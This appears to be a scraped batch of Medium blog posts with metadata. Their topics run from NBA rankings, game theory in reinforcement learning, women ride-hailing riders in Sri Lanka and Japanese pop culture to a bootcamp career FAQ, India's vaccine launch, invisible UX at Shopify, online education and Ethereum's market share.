The Lakers have finally regained their glory after Lebron James and Anthony Davis led the purple and gold to their 17th NBA title, tying the Boston Celtics for most in league history. After the offseason the Lakers had, there is no reason they are not primed for another title run. They resigned AD to a max deal and added key pieces around the floor including C Marc Gasol, F Wesley Matthews, and both the sixth man of the year, F Montrezl Harrell and the runner-up, G Dennis Schroder. With a more talented and younger team around Lebron, the L.A Lakers head into the new season the best in the NBA. | https://medium.com/basketball-university/nba-power-rankings-the-top-10-teams-heading-into-the-20-21-season-5fc60183e8d | [] | 2020-12-15 18:22:33.435000+00:00 | ['Basketball', 'Sports', 'Los Angeles', 'NBA', 'LeBron James'] |
How Modern Game Theory is Influencing Multi-Agent Reinforcement Learning Systems Part II | How Modern Game Theory is Influencing Multi-Agent Reinforcement Learning Systems Part II
Mean-Field Games, Evolutionary Games and Stochastic Games are having an impact in the new generation of reinforcement learning systems.
This is the second part of an article discussing new areas of game theory that are influencing deep reinforcement learning systems. The first part focused on types of games that we are actively seeing in multi-agent reinforcement learning systems. Today, I would like to cover three new areas of deep learning theory that can influence new generations of reinforcement learning systems.
Game theory plays a fundamental factor in modern artificial intelligence(AI) solutions. Specifically, deep reinforcement learning(DRL) is an area of AI that embraced game theory as a first-class citize. From single-agent programs to complex multi-agent DRL environments, gamifying dynamics are present across the lifecycle of AI programs. The fascinating thing is that the rapid evolution of DRL has also triggered a renewed interesting in game theory research.
The relationship between game theory and DRL seems trivial. DRL agents learn by regular interactions with an environment and other agents(in the case of multi-agent DRL). Incorporating incentives into DRL environments is a very effective way to influence the learning of agents. . While most DRL models are still based on traditional game theory concepts such as the Nash equilibrium or zero-sum-games, there are new methods that are steadily becoming an important element of AI programs. Let’s explore three new game theory trends that are making inroads into DRL research.
Mean Field Games
Mean Field-Games(MFG) are a relatively new area in the game theory space. The MFG theory was just developed in 2006 as part of a series of independent papers published by Minyi Huang, Roland Malhamé and Peter Caines in Montreal, and by Jean-Michel Lasry and Fields medalist Pierre-Louis Lions in Paris. Conceptually, MFG comprises methods and techniques to study differential games with a large population of rational players. These agents have preferences not only about their state (e.g., wealth, capital) but also on the distribution of the remaining individuals in the population. MFG theory studies generalized Nash equilibria for these systems.
A classic example of MFG is how groups of fish in a schooling swim in the same direction and in a coordinated matter. Theoretically, this phenomenon is really hard to explain but it has his roots on the fact that a fish reacts to the behavior of the closest group. More specifically, each fish does not care about each of the other fishes individually but, rather, it cares about how the fishes nearby, as a mass, globally move. If we translate that into mathematical terms, the reaction of fishes to the mass is described to the Hamilton-Jacobi-Bellman equation. On the other hand, the aggregation of the actions of the fishes which determines the motion of the mass corresponds to the Fokker-Planck-Kolmogorov equation. Mean-field game theory is the combination of these two equations.
From the DRL standpoint, MFG plays an interesting role in large-scale environments with a large number of agents. Until now, DRL methods have proven impractical in environments with near infinite number of agents given that they require to operate with inexact probabilistic models. MFG is an interesting approach to model those DRL environments. AI research startup Prowler recently did some work evaluating MFG in large, multi-agent DRL environments.
Stochastic Games
Stochastic games date back to the 1950s and were introduced by Nobel-prize winner economist Lloyd Shapley. Conceptually, stochastic games are played by a finite number of players on a finite state space, and in each state, each player chooses one of finitely many actions; the resulting profile of actions determines a reward for each player and a probability distribution on successor states.
A classic form of stochastic games is the dinning philosophers problem in which there are n + 1 philosophers (n ≥ 1) sitting at a round table with a bowl of rice in the middle. Between any two philosophers who sit next to each other lies a chopstick, which can be accessed by both of them. Since the table is round, there are as many chopsticks as there are philosophers;. To eat from the bowl, a philosopher needs to acquire both of the chopsticks he has access to. Hence, if one philosopher eats, then his two neighbors cannot eat at the same time. The life of a philosopher is rather simple and consists of thinking and eating; to survive, a philosopher needs to think and eat again and again. The task is to design a protocol that allows all of the philosophers to survive.
Stochastic games are already being used in DRL solutions related to multi-player games. In many multi-player environments, teams of AI agents need to evaluate how to collaborate with and compete against each other in order to maximize the positive outcomes. This is often known as the exploration-exploitation dilemma. Building stochastic games dynamics into DRL agents is an efficient way to balance the exploration and exploitation capabilities of DRL agents. DeepMind’s work mastering Quake III incorporates some of these stochastic game concepts.
Evolutionary Games
Evolutionary Game Theory(EGT) draws inspiration from the Darwinian theory of evolution. The origins of EGT can be traced back to 1973 with John Maynard Smith and George R. Price’s formalization of contests, analyzed as strategies, and the mathematical criteria that can be used to predict the results of competing strategies. Conceptually, EGT is the application of game theory concepts to situations in which a population of agents with diverse strategies interact over time to create a stable solution, through an evolutionary process of selection and duplication. The main idea behind EGT is that many behaviors involve the interaction of multiple agents in a population, and the success of any one of these agents depends on how its strategy interacts with that of others. While classic game theory has been focused on static strategies, that is to say, strategies that do not change over time, evolutionary game theory differs from classical game theory in focusing on how strategies evolve over time and which kind of dynamic strategies are most successful in this evolutionary process.
A classic example of EGT is the Hawk Dove Game that models a contest between a hawk and a dove over a shareable resource. In the game, each contestant follows exactly one of two strategies described below:
· Hawk: Initiate aggressive behavior, not stopping until injured or until one’s opponent backs down.
· Dove: Retreat immediately if one’s opponent initiates aggressive behavior.
If we assume that (1) whenever two individuals both initiate aggressive behaviour, conflict eventually results and the two individuals are equally likely to be injured, (2) the cost of the conflict reduces individual fitness by some constant value C, (3) when a Hawk meets a Dove, the Dove immediately retreats and the Hawk obtains the resource, and (4) when two Doves meet the resource is shared equally between them, the fitness payoffs for the Hawk-Dove game can be summarized according to the following matrix:
EGT seems to have been designed with DRL environments in mind. In multi-agent DRL environments, agents regularly modify their strategy by interacting with each others. EGT is an effective way to model those interactions. Recently, OpenAI showed some of those dynamics training agents to play a game of hide-and-seek. | https://medium.com/dataseries/how-modern-game-theory-is-influencing-multi-agent-reinforcement-learning-systems-part-ii-4f47166d0fe6 | ['Jesus Rodriguez'] | 2020-06-26 12:37:04.036000+00:00 | ['Machine Learning', 'Deep Learning', 'Data Science', 'Invector Labs', 'Artificial Intelligence'] |
The Race is On for Women Ride-hailing Customers in Sri Lanka | By Henriette Kolb and William Sonneborn
Few industries have been impacted by the COVID-19 pandemic more than the transport industry. Both the public and private sector, including ride-hailing, are looking for solutions that will ensure a sustainable future. To ensure a resilient recovery from the pandemic and the opportunity to thrive, it is essential for companies not only to create safe travel options, but also to attract customers who haven’t previously used tech-based transport.
A new International Finance Corporation (IFC) study conducted with the Sri Lankan ride-hailing company, PickMe, and IFC’s development partner, the Australian Department of Foreign Affairs and Trade (DFAT), suggests that ride-hailing platforms should look to an important, but often underserved market: women. The report finds that annual revenues could increase by over a quarter if differences between women and men in the percentage of riders and frequency rides were closed. We found that while existing women riders in Sri Lanka are more likely than men to depend on ride-hailing to cover basic transport needs, they take fewer trips overall because they are less likely to join the workforce or go out at night.
These barriers are not easily overcome. However, IFC is increasingly seeing a “race to the top” as companies across the industry invest in solutions that bring women riders and drivers into the market.
PickMe, has established a dedicated team with the mandate to recruit, retain, and support women drivers- a key to attracting women riders. PickMe reported that many women register to drive, but end up dropping out and found that having a personal touch, through the dedicated team, builds the personal connections that enable women to stay on the platform over time.
Recently, the PickMe platform has gone a step further by rolling out products designed to support women. For instance, the app adjusted its rider-driver matching algorithm so that if a man and a woman driver were to be equidistant from a potential courier pick-up, the woman driver would receive the trip. The company also piloted a “Lady First” option where women riders had the option to select a woman driver. Coupled with solutions like a 24-hour hotline, PickMe hopes to attract more women, who remain widely underrepresented in ride-sharing and in transport work more broadly, to join the sector.
Other effective approaches include working with employers to develop transport partnerships and continuously innovating on safety and security measures.
Solutions like these can also have strong social high impact in markets like Sri Lanka, where limited access to transport has been consistently linked to low female labor force participation rates. In surveys, 64 percent of women PickMe riders said that they can access more or better jobs thanks to ride-hailing; and 88 percent said ride-hailing gives them access to new places. This finding reinforces IFC’s previous research in six countries showing that women with access to ride-hailing reported increased mobility- even for women who were affluent or had multiple transport options.
As markets around the world face the challenge of responding to the COVID-19 pandemic, a call has gone out for a resilient recovery to ensure that our economies grow back stronger, greener, and more equal than the ones we had before -The private sector can, and should, play a key role in addressing the recent rise in gender inequality. Safe, affordable, and accessible transportation is a central element of that recovery. By designing for women, ride-hailing can drive change for the better.
To learn more about women and ride-hailing join IFC’s roundtable with PickMe, Uber, and Bolt on December 9 or check out the following resources:
· Women and Ride-hailing in Sri Lanka (Report)
· Driving toward equality: Women, ride-hailing, and the sharing economy (Report)
· Gender-segregated transport in ride-hailing: Navigating the debate (Report)
· Will women return to ride-hailing after the coronavirus pandemic? (Blog)
· Five things a global study on ride-hailing tells us about women and the sharing economy (Blog) | https://medium.com/@ifc-org/the-race-is-on-for-women-ride-hailing-customers-in-sri-lanka-d67f4ed7d587 | [] | 2020-12-07 19:53:27.202000+00:00 | ['Sri Lanka', 'Ride Hailing', 'Women In Business', 'Women', 'Ridesharing'] |
Changing Trends in Japanese Pop Culture | Japan is well-known for being a trendsetter, developing popular media, games, and other ideas and concepts that rapidly work their way into Western culture. Staying one step ahead of these trends means keeping a close eye on developments in the country. If you’re interested in learning more about what is coming out of Japan and what you may be looking forward to as we approach the new year, here are a few changing trends in Japanese pop culture worth paying attention to.
Photo by Jezael Melgoza on Unsplash
Itasha: Expressing Individuality Through Car Culture
Itasha is a term that refers to cars that have been heavily decorated with characters and logos stemming from popular anime and manga, often with an emphasis on featuring female characters hailing from the individual series that the car owners are interested in. A way to express individuality, the level of decorations may vary from person to person. For example, some people may only have the outside of the car painted, while others will go all out and include peeling stickers, air fresheners, and even license plate frames. You may even find some cars that have been heavily modified with exciting light displays, massive speakers, and expensive merchandise adorning both the interior and the exterior of the vehicle.
If you’re a lover of any manga or anime, this is absolutely one trend you’ll want to get behind as you may be able to find others who share your passion or even attend an event filled with itasha, itansha, and itachari!
Embracing Fashion
Photo by Alex Sheldon on Unsplash
Many will wear otaku clothing (otaku is a term used to refer to what we would call geek culture) to represent their favorite character. It’s a fun way to express your style and personality, and it’s perfect for everyday wear.
You can also take it a step further by exploring cosplay. This is when you dress and act like the character. Depending on the anime, you may be able to wear a complete outfit that looks just like the anime without anyone even realizing you’re playing a character.
A Return to Retro Gaming
Much of the gaming that has permeated Western culture was developed in Japan, and like all trends, many things return as trends once a couple of decades have passed. As a result, retro gaming seems to be making a comeback in Japan, with popular titles like Super Mario Bros and Donkey Kong as well as once obsolete gaming systems like the NES or the Super NES becoming popular once again. Whether it’s in the home or in gaming arcades or cafes, don’t be surprised if you see some of your favorite old games make an appearance in your life again.
Vegetarian Food
Interestingly enough, some of the health and food trends that became quite popular in the West are now moving to the East, despite the fact that we’ve seen quite a few food trends rise from the East in past years (take, for example, foods and drinks like boba tea or fluffy pancakes, both of which have taken the West by storm).
Arguably two of the biggest trends taking hold of Japan are vegetarian food and intermittent fasting. Despite the fact that vegetarian food is by no means a new development, it wasn’t something that was very popular in Japan until recently, which is largely due to the fact that meat is a staple in many Japanese meals and is not as problematic as it has become in Western culture. Now, more and more small restaurants are beginning to experiment with these types of meals, offering interested customers the ability to eat meals with meat substitutes and focus more on dishes that offer more vegetables than a traditional dish would.
Intermittent Fasting
Intermittent fasting is another concept that has grown in popularity in the West (much more recently than vegetarianism, however) but also hasn’t really made as much of an impact on the rest of the world as it has in America. Now, having a one day diet seems to be making its rounds throughout Japan, especially for those who are only looking to lose a little weight by consuming only liquids for 24 hours. While this may not be a trend that’s as impactful as the others listed above, it’s definitely interesting to see it play out as more people begin to adopt this kind of diet.
As cultures change and grow, trends come and go as well. Keeping tabs on these trends as they develop allows you to see which trends you may see developing within your country as well as showing you what trends may have developed elsewhere that are now impacting other countries, such as the examples in Japan listed above. Whatever your reason for being interested in these new Japanese trends, the article will help introduce you to some trends that may be new to you as well as some that you may already be familiar with! | https://medium.com/all-about-surrounding/changing-trends-in-japanese-pop-culture-f6ab301e299d | ['Tess Dinapoli'] | 2020-12-24 05:08:50.501000+00:00 | ['Asian Culture', 'Japanese Culture', 'Fashion', 'Japanese', 'Fashion Trends'] |
How I Successfully Changed Careers to Software Engineering with a Coding Bootcamp | Frequently Asked Questions
“What advice can you give me as a job seeker in tech?”
Well first I would say “google it”. I can’t tell you how to live your life exactly, but if you’re already doing basic things like writing quality cover letters and have worked on your resume (and have gotten it critiqued by friends, family, professionals), then maybe these 4 tips might help you go further:
If you couldn’t tell from my experience, GO TO HACKATHONS! It was amazing experience (not to mention all the free swag) and if you can’t go to one then I encourage you to make your own hackathon by setting aside a couple days of solid work and a lot of snacks and see what you can accomplish.
Have a portfolio to showcase your work to employers that describes each project you’ve work on, as well as a tailored LinkedIn profile.
Go on meetup and join a coding group like your local chapter of Code for America or sign up for an networking or informational event. (At the time of writing this, the COVID pandemic has decreased the number of these events, but many of them are still happening virtually!)
Start working on your next project. Either have it be a personal project or find a group to collaborate with, but you should always be working on something to keep your skills sharp and so you have something current to talk about during an interview.
“Would you recommend General Assembly?”
HECK YES (the Boston location at least).
As I said before, I know nothing about other GA locations. They each have different curriculum, teachers, and staff. If you’re looking at a GA location besides Boston, I would recommend visiting them and checking out the space and curriculum for yourself, as well as asking about how GA experience is viewed in that location’s job market. That being said, I have no reason to believe that other locations are not excellent, I just do not claim to know that they are for sure.
Without the teachers and staff at GA Boston, I do not think I ever could have made such a successful career transition. (Okay, maybe not ever, but I sure as hell couldn’t have done it in under a year.)
“I’m considering a bootcamp… is it right for me?”
There are a lot of options to take into consideration when deciding whether or not to enroll in a bootcamp. One big consideration is finances: is it worth it for you spend the money on the bootcamp, and how much do you think your salary is going to change in order to offset that cost? For me, the increase in salary over the course of one year would be enough to cover the cost, so in my case the cost of the bootcamp seemed justified. Also consider if a bootcamp cost is something your company will cover if you’re already in a similar industry, or if your company will hire you back in a different position if you complete the course.
Another major factor is your overall happiness. Look into why you’ve considered tech in the first place… is it something you actually like or are you just doing it for the salary and perks? If you can’t stand getting frustrated by bugs or don’t enjoy learning new things all the time, then maybe you need to reconsider. Really make sure that this is something you like to do, or at the very least can tolerate it so that you’re not miserable. If you’re already in a technical role, such as mechanical engineering, then maybe software engineering won’t be that much of a leap for you. If you have no technical background (like me, hello), then I suggest you really make sure you try out a good amount of online learning for a while before you quit your job and drop a ton of money on a career change.
“Can I get a job in software without going to a bootcamp?”
Of course! Lots of people do. But you have to have a lot of self-discipline, time, and patience. One of the things I love most about coding is that you can learn almost everything online somewhere for free if you search for it. It’s insanely more accessible than most fields, and can be a great hobby too if you’re just looking to try it out and gain some additional skills.
“Am I smart enough to be a software engineer?”
I don’t know you, but you probably are. The majority of people in my ~30 person cohort figured everything out and finished hard projects; you can too. I do not consider myself a traditionally “smart” person, meaning I don’t usually see something and just get it or remember it, but I do work hard and I’m passionate about learning.
Women in particular ask themselves this question a lot, and I admit that I did too at first (jk, I still do some days). Girls at a young age are often conditioned by society to think that they should be automatically good at everything, so when they try something new and aren’t great at it, they typically just give up and move on (or even worse, they just don’t try at all). It’s because of that early conditioning that we see so many less women in technical roles. One of my greatest realizations with changing careers to software engineering is that it’s okay to be wrong. That’s what error codes are for. You go back, try different things, and see what works.
“How do I split up my time during the job search?”
It’s going to depend a lot on your own schedule, responsibilities, and needs, but I can tell you what worked for me.
40% continued learning: working on projects, online courses and coding challenges for interviews on sites like leetcode or codewars.
30% applying for jobs: searching for openings, completing applications, writing quality (I’ll say it again for all you copy-and-pasters, QUALITY) cover letters. Make sure you keep a spreadsheet of everywhere you’re applying and try to shoot for about 10 quality applications a week, not just that 1-click apply button.
20% networking: going to events either virtually or in person (when that finally becomes a thing again) and reaching out to people in your network to have a coffee or a quick chat about their career or company.
10% self care: the job search is long and tedious, and you can easily wear yourself down in only a couple weeks. I make sure I do at least one thing for self care every day that ranges from 10 minutes to 1 hour, such as reading outside, grabbing a coffee, going for a walk, exercising, putting on a face mask, or trying out a new recipe to cook. In addition to this, something that the career coaches stressed to us was “respect the weekend”, which I did do most of the time (honestly it can be hard to know it’s even the weekend when all your days are the same).
Treat the job search like a full-time job. That means 8 hours a day, 40 hours a week.
“I’m not having any luck finding a job, what should I be doing differently? Should I give up?”
I get it. Maybe it’s been a month into the job search and you haven’t heard back from anyone and you’re ready to throw in the towel. But hang in there and just know that the job search takes time. Our career coaches at GA told us that it’s very rare to get a job right out of the bootcamp, and it usually takes on average around 4 months for most people to get jobs. Be prepared for longer just in case, especially since we are in uncharted waters with the coronavirus pandemic. The job search is not a sprint, it’s a marathon, and you need to pace yourself accordingly to get through it. If you’re not finding any success with what you’re doing, do some research online and try to modify what you’re doing to see if something else works.
If you find yourself in a tricky situation because of finances in a job search that is seemingly endless, I suggest trying to get a part-time job to help pay some bills and keep you busy. Many people find that having the extra responsibility of a part-time job provides more structure and they’re less likely to waste time because they can’t afford to anymore. However, be aware that not treating the job search as a full-time job may lead to an extended job search in the long run.
“What is the interview process like?”
It really depends on the company! For my Red Hat internship, the decision was based on a video call and I only had to answer soft technical questions about some of my projects, no actual coding was involved. For most of my other interviews at different companies I had to do coding challenges either in the form of a take-home challenge or whiteboarding if it was in person. Most of the coding questions, especially whiteboard problems, were problems that would be considered to be at the “easy” level on leetcode.
The general format for the job interview processes I went through were a phone screening first, followed by a take-home challenge, and then an on-site interview, but there are a lot of variations.
“How do I prepare for interviews?”
Do coding challenges EVERY. DAY. Leetcode and Codewars were my favorites to use. Make sure you know how to check if a string is a palindrome.
I also watched a lot of YouTube interview practice videos, but I found that this didn’t help me as much as actually trying out these problems on my own did. What I did do sometimes was I would start a YouTube video, wait to see what the interview problem was, try to answer it myself, and then if I got stuck I would go through and only watch it until I was able to get to the next step of the problem. When I was finished solving the problem I would then watch the rest of the video to see how they went about solving it and see how mine differed.
In addition to “hard” technical interview questions, you could also be asked “soft” technical questions (“explain what happens when you google something?”).
Lastly, do not neglect the personality interview questions. Have personal stories prepared in your head that recalls a time when you worked on a team, or when you were asked to do something you didn’t agree with.. those kind of questions. Make sure you practice them too so you don’t stumble over words or forgot important pieces because you’re nervous.
“Do I need a portfolio?”
Maybe not if you have a college degree backing you up, but it can’t hurt to have one. However, if you’re a career changer like me without that coveted computer science diploma, then I strongly encourage you to make a portfolio (here’s mine for an example).
Unless you’re great at user experience and design, I would suggest you use a template like I did. I purchased mine for only $13, which is about the cost of a fairly average drink at a bar in Boston and a lot more useful. There are also a lot of free templates you can use that are just as good. | https://medium.com/swlh/how-i-successfully-changed-careers-to-software-engineering-with-a-coding-bootcamp-fdc16831221 | ['Regina Scott'] | 2020-06-22 21:44:45.233000+00:00 | ['Coding', 'Job Hunting', 'Bootcamp Experience', 'Software Development', 'Codingbootcamp'] |
coronavirus vaccine news | Live: Corona vaccination begins in the country, Serum CEO Adar Poonawala also took the vaccine
Today, the world’s largest vaccination drive has started in India. Prime Minister Narendra Modi launched the Corona Vaccination Campaign through a virtual address. PM Modi said that scientists have worked hard to develop the corona vaccine. PM Modi said that for such a day, Rashtrakavi Ramdhari Singh Dinkar had said that the stone becomes water when a human exerts a force.
Every Indian proud with unprecedented achievement- Amit Shah
“coronavirus vaccine news” Home Minister Amit Shah also expressed happiness over the introduction of the corona vaccine. Amit Shah said that India is one of the few countries which has won in the direction of ending the biggest crisis against humanity.
Every Indian is proud of this unprecedented achievement. This is the emergence of a new self-sufficient India on the globe. Many congratulations to all the scientists. Amit Shah said that this ‘new India’ under the leadership of Modi Ji is an India that transforms the people into opportunities and challenges into achievements. This ‘Made in India’ vaccine is a reflection of the resolve of this self-reliant India. On this historic day, I bow to all our Corona warriors. | https://medium.com/@yashshrivastava7860/coronavirus-vaccine-news-c64f27798c5c | [] | 2021-01-16 09:42:10.210000+00:00 | ['Covid 19', 'Coronavirus Update', 'Vaccines', 'Corona', 'Coronavirus'] |
Designing for invisible UX | Designing for invisible UX
This piece was co-written with Kay Jorgensen.
Content discovery is a big deal right now. For many of us, powerful search experiences and refined recommendations help us plan and move through much of our day.
The tools that power this content discovery are evolving. For product teams, a user’s experience of these tools is becoming synonymous with their experience of their products. As a result, there’s a growing call to design these tools the same way we design the products they’re embedded in.
As content designers, we’ve got lots of practice designing intentional user experiences. The content designers at Shopify have an amazing toolkit of tactics to do this. Typically we talk about using these tactics to build things that merchants control, or at least know they’re using. But we often don’t want merchants to focus on the content discovery tools we embed in products because we want them to focus on the product itself. As two content designers working on search and personalization problems, we struggled to understand how to apply familiar tactics to design the less tangible products that we work on. We refer to our work on these products as invisible UX.
Understanding invisible UX
We developed a framework based on systems thinking principles to break invisible UX projects into pieces that we could define and understand. The framework outlines components that, when combined, form the basis of invisible experiences. The framework is made up of four components: inputs, structure, output, and the interface. Design thinking can be applied to each of them.
Input
The input is the data the system uses to accomplish its intended function. The data could be anything: metrics like sales, visits, or availability of products; or content attributes like product tags and descriptions. The data might also come from an action or behavior, like the act of selecting or creating something, entering information, or abandoning flows. Systems are often built around multiple inputs. In more complex systems, logic and conditions are applied to make meaning out of different kinds of inputs.
Deciding what to use as the input for a system will be dependent on the goals of the project. UX can help identify and define which inputs are relevant by exploring the problem space using UX tactics such as audits.
Structure
The input is organized according to a structure. Structures are principles for organizing your inputs. Designing the structure for a system involves things like defining the sorting logic or conditions. The structure might sort inputs programmatically, like through an algorithm, or manually.
Defining the structure is often a key deliverable for content designers involved on these projects. Articulating how decisions about the structure of a system affect an overall experience is another important UX opportunity. Think about the data used and what you want the feature or product to do. This will help you make decisions about how to organize the inputs you’re working with. It also makes it easier to plan how you might help people understand how these systems work.
Output
Ultimately, the structure results in an output that should solve a user problem. At Shopify, we define outputs to do things like:
Help a merchant find apps
Recommend actions
Provide business insights about their store
We should be mindful of how well our outputs help people solve the problem we’re focusing on. Think about how to create a flexible structure that can respond to feedback about the quality of the outputs.
Part of our UX practice is thinking about the different possible paths through an experience. For invisible UX, that includes accounting for the different responses people might have to the output they receive. It also includes accounting for the different kinds of output that a system will define. Documenting and preparing for both of these helps us plan for how to represent the outputs on the UI.
Interface
Usually, people use an output by interacting with it on the UI. How the output gets represented on the interface depends on what problem is being solved. If the output helps someone find something they’re searching for, then it will likely look different from an output that’s recommended to someone because it’s related to their interests. The same output could be represented in different places throughout a product. The context for where the output is being shown also affects how we represent it in the UI.
How and where an output is represented depends on what the system and product are designed to do. Applying UX thinking to every component in a system helps us to frame those systems on the interface.
Working on an invisible UX project
To explain what this looks like when it’s applied, let’s talk about Shopify’s native search. This is offered to all merchants on Shopify with an online store.
An example of Shopify’s native search on an online store.
Over a year ago, we started with a search experience that didn’t accommodate for errors or spelling mistakes. Customers had to use exact terms to get results — which is a near impossible task for a user who might not know what they’re searching for, or is visiting a store for the first time.
We were also dealing with a search system that doesn’t really have a taxonomy. Our fields for product titles, tags, product type, and collections are free form and merchants use these fields in different ways, depending on their industry, size, and needs.
We started with trying to understand what users expect from search. We audited everything from library searching to different ecommerce platforms, as well as segmenting different types of searchers. We learned that merchants interact with search in so many different ways, depending on where they are in their purchase journey. This helped set some of the foundational UX guidelines for
What inputs need to be part of the structure
How flexible this structure needs to be in terms of relationships and logic
What that structure should output
As with any project, scope was important. We needed to define what the system should and shouldn’t support — Do we need to include all the available store data? Should it display recommendations or alternatives? These UX questions helped establish what the feature needs to do and what needs to be part of the system.
How the invisible UX framework was applied to storefront search.
Experimentation can begin
Once we’d mapped out the current system, we were ready to start exploring and experimenting.
We experimented with a few different things:
Logic
Resources
Attributes
Hierarchy
Ranking
Relationships
What should the relationship between attributes and search functionalities be? Do we need to create different relationships for different attributes? In what conditions do these relationships apply?
Because we had broken down the system into our framework, we were able to pinpoint where in the system we needed to tweak something when the interface didn’t produce the experience that we wanted. Without this it would have made these different layers, conditions, and functions really confusing to keep track of.
All of these questions were answered by the UX team — but the answers didn’t impact the interface as noticeable design elements. As you see we haven’t mentioned field size, or buttons, or labels. Our solutions were — invisible.
Last but not least, one of the most important tasks that we did as a team was to align on definitions and terminology. We sat together with data and development, mapping out the important parts of the system, identifying the terms, aligning on what they meant, and where they would affect the user journey, UI, and related user tasks. By doing this, we were able to find more merchant-friendly terms and communicate more efficiently as a team.
Familiar tactics for new problems
Invisible UX projects often address a new kind of problem. But even for new problems, design thinking can contribute to crafted solutions through structure, definition, and establishing context. Using a framework helped us understand our contributions as designers working on invisible UX because it made the work more tangible. Thinking about our product as a system made of pieces with names and functions gives us a better way to communicate and collaborate with our teammates, and it helps us connect our decisions to the problems and user experience we’re working on. Frameworks are another familiar design tactic that works to make sense of these new problems too. Try it out. Find the invisible UX in your products and use a framework to help you understand how you might contribute to designing the user experience in these often overlooked spaces. | https://ux.shopify.com/designing-for-invisible-ux-5d92a2b4bf59 | ['Evija Sundman'] | 2020-12-09 16:11:59.780000+00:00 | ['Systems Thinking', 'Content Design', 'UX', 'Design Thinking', 'Content Strategy'] |
How coronavirus is going to change education forever | IMAGE: Marina Shemesh on Flickr (CC — BY SA)
I particularly enjoyed this story about how some people are using videos of themselves paying attention, which they then play on a loop, so they can do other things while supposedly attending a meeting or class over the net. I couldn’t help smiling at the thought of my students listening to me in the background “just in case” I call them, while they are playing games or texting friends. What’s more, this is a ruse that wouldn’t be so hard to pull off: even the small jump that the restart of the loop would generate would be practically imperceptible and would likely be confused with a simple glitch or connection fault.
Fortunately, I am privileged to teach students whose attention span matches the money they have paid for their education and the selection process they have gone through. Our relationship is based on trust: they want to be taught as productively as possible in the best possible way under the present circumstances, and I want to do the same, teach the the best way possible under the current circumstances.
In some cases, particularly in courses where I use the old (about to be retired) Adobe Connect for delivery, it’s clear that interaction suffers, and what we usually do is have the teacher speak while students watch on camera and share the screen with our presentations, and ask their questions or answer teacher’s through the chat (they could use the microphone, but it’s clumsy). When we use more advanced tools, such as WoW in a Box or, in the case of other universities, Zoom, GoToMeeting, Webex, Google Classroom or similar, interaction is better and teachers can see the faces of their students, allow them to ask questions when they raise their hand virtually and, with practice, the experience is quite comparable to a classroom. In other cases, particularly programs that were designed for distance learning, interaction continues to be through asynchronous forums with constant moderation by the teacher (this week I am teaching one such group) and, occasionally, using video conferencing.
The differences are evident, and they raise a fundamental question: is online education just a substitute for online teaching, or are we already at a point where it could be considered comparable or even a better experience? The answer is complex. When students have expectations of face-to-face training, if the substitute for an emergency is proposed as an interaction through a forum or a platform with limitations, satisfaction levels drop, because there is an apparent gap in those expectations, and students may prefer to postpone their course and wait for normal service to resume. If the substitution is carried out with a tool rich in interaction, this happens less often.
However, there is another component, which which is why IE University’s online courses are among those that generate the greatest satisfaction based on student feedback: the forum format (supplemented with some opportunities for personal interaction and others for online conferences via interactive video), tends to be much richer than a face-to-face environment. I know this sounds counter-intuitive, but it’s something I’ve been testing for a very long time, bearing in mind that my first experiences in online environments were no less than twenty years ago: while students can only participate in a class discussion for a minute or two at best (before classmates get impatient), and they must do so loud based on their ability to think on their feet, in an asynchronous online environment they can participate whenever they want, use time to collect their thoughts, and even include other resources such as links to articles or videos. The result, from a relatively simple learning curve, is more in-depth discussions and better opportunities for learning.
Many institutions call online education the simple development of self-administered tools, content in which students progress through exercises and occasionally undergoing assessment tests. This methodology, which may be sufficient for certain subjects, corresponds to a completely different concept, where the teacher’s role is minimal, or is even replaced by tutors who answer questions more or less mechanically. This is a completely different product, which is not necessarily bad — as long as it meets the expectations of the student who enrolled in it, satisfaction may be high — that generally tends to have single figure achievement percentages: it is perfectly normal for only 2% or 3% of those initially enrolled to end up consuming all of the available course content.
A period of confinement like the present should be the time to consider experiments, to test tools and to try to provide our students with the best possible experience, comparable to the expectations we generated when they started their programs. If we are not able to do this, we will not be able to move on to the next phase, which will undoubtedly start after the lockdown: that all courses are developed simultaneously face-to-face and online, so that students can, at any time, decide whether to attend a class in person or follow it — with the right level of interaction — via the web when, for example, they have flu or any other potentially contagious disease. Whether we are talking about a class or an exam, the challenge is moving smoothly between a face-to-face and a virtual platform, without this impacting negatively on the learning experience.
I sincerely believe this will be the next phase, if only because we are going to be very wary for some time of anybody with the slightest cough. If we think the present situation is an exception and that, after quarantine, everything will return to how it was before, I think we are wrong. Education is one of the most important challenges, it will surely change after this episode (with all that this entails in terms of opportunity for those who know how to deal with it properly), and it will be essential for institutions to be up to speed. | https://medium.com/enrique-dans/how-coronavirus-is-going-to-change-education-forever-bf41dadfed5d | ['Enrique Dans'] | 2020-03-31 09:46:50.837000+00:00 | ['Education', 'Online Learning', 'Ie University', 'Online Education', 'Coronavirus'] |
Life of a Designer Through Funny Memes | It’s year-end and it is a fun time of the year. We have all been stressed enough during the entire 2020 and it is time we should leave the past and welcome the new year with all fun and excitement. In today’s blog post, I am sharing a collection of funny web design memes hoping to tickle the funnier side of our regular designer’s lives. So let’s laugh out loud and enjoy. | https://medium.com/nyc-design/life-of-a-designer-through-funny-memes-18257210e91c | ['Akbar Shah'] | 2020-12-28 06:36:31.274000+00:00 | ['UX Design', 'UI Design', 'Web Design', 'Design', 'New York'] |
Easy Database Access | Get more citations to your research
by enabling easier access to research
and get more credit for your work
Blackcoffer handles the maintenance updates hosting etc.
So your research is easier to understand
and gets cited often
We reduce the friction in publishing research
BY making it easy to play with data.
Example 1:
Read More | https://medium.com/data-analytics-and-ai/easy-database-access-2305dd48c00c | ['Ella William'] | 2019-06-11 06:10:12.524000+00:00 | ['Analysis', 'Data Science', 'Data', 'Information Technology'] |
Smart Contract Platforms & Ethereum’s Dominance | Ethereum dominated the crypto market in 2017 as the smart contract platform of choice for ICOs and blockchain projects. In 2017, over 95% of projects decided to run their token sale and/or build their decentralized application using Ethereum’s ERC20 standard (or some form of it).
While Ethereum clearly has first mover advantage, it seems to be slowly losing support over time from dApp developers in favor of newer, faster, more feature rich smart contract platforms. Its flaws are becoming more clear as the crypto market matures; with scalability being a hot topic in 2018. A significant amount of commercial grade decentralized applications require a higher throughput, or the capacity to process more transactions per second (TPS). While an Ethereum smart contract is a decent tool for raising funds via an ICO, it is less than satisfactory when it comes to running and deploying apps. In a nutshell, Ethereum is slow and requires expensive gas fees paid by the end user, making the smart contract platform landscape ripe for disruption.
This graphic shows how Ethereum is losing market share to its competitors over time in 2018:
